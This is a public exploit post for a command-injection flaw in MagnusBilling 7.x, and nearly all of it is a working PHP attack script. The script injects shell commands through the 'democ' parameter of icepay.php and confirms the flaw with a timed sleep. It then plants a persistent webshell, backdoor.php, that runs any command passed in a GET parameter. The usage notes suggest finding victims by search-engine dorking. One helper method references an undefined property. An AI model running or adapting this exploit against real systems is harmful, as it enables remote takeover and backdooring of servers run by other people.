MagnusBilling 7.x Command Injection

`=============================================================================================================================================  
| # Title : MagnusBilling 7.x Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.magnusbilling.org/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 83 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class MagnusBillingExploit {  
private $targetUri;  
private $webShellName;  
  
public function __construct($targetUri) {  
$this->targetUri = $targetUri;  
}  
  
// Function to execute commands on the target  
public function executeCommand($cmd) {  
$url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
return file_get_contents($url); // Send HTTP request  
}  
  
// Function to execute PHP code on the target  
public function executePhp($cmd) {  
$payload = base64_encode($cmd);  
$url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
$postFields = [$this->postParam => $payload];  
return $this->sendPostRequest($url, $postFields); // Send POST request  
}  
  
// Upload backdoor webshell to the target  
public function uploadBackdoorWebShell() {  
// Name of the webshell to be uploaded  
$this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file  
  
// Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
$backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";  
  
// Encode the webshell content  
$encodedPayload = base64_encode($backdoorCode);  
  
// Construct the command to upload the backdoor  
$cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";  
  
// Execute the command to upload the backdoor  
return $this->executeCommand($cmd);  
}  
  
// Check if the target can be exploited  
public function check() {  
$url = $this->targetUri;  
$response = file_get_contents($url);  
if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
return "Safe: Likely not a MagnusBilling application.";  
}  
  
$sleepTime = rand(4, 8);  
$this->executeCommand("sleep {$sleepTime}");  
sleep($sleepTime); // Simulate blind command injection  
  
return "Vulnerable: Command injection successful.";  
}  
  
// Main function to exploit the target  
public function exploit() {  
echo "Uploading backdoor...\n";  
$result = $this->uploadBackdoorWebShell();  
if (!$result) {  
die("Backdoor upload failed.");  
}  
echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
}  
  
// Helper function to send POST requests  
private function sendPostRequest($url, $postFields) {  
$options = [  
'http' => [  
'method' => 'POST',  
'header' => 'Content-Type: application/x-www-form-urlencoded',  
'content' => http_build_query($postFields)  
]  
];  
$context = stream_context_create($options);  
return file_get_contents($url, false, $context);  
}  
}  
  
// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();  
  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`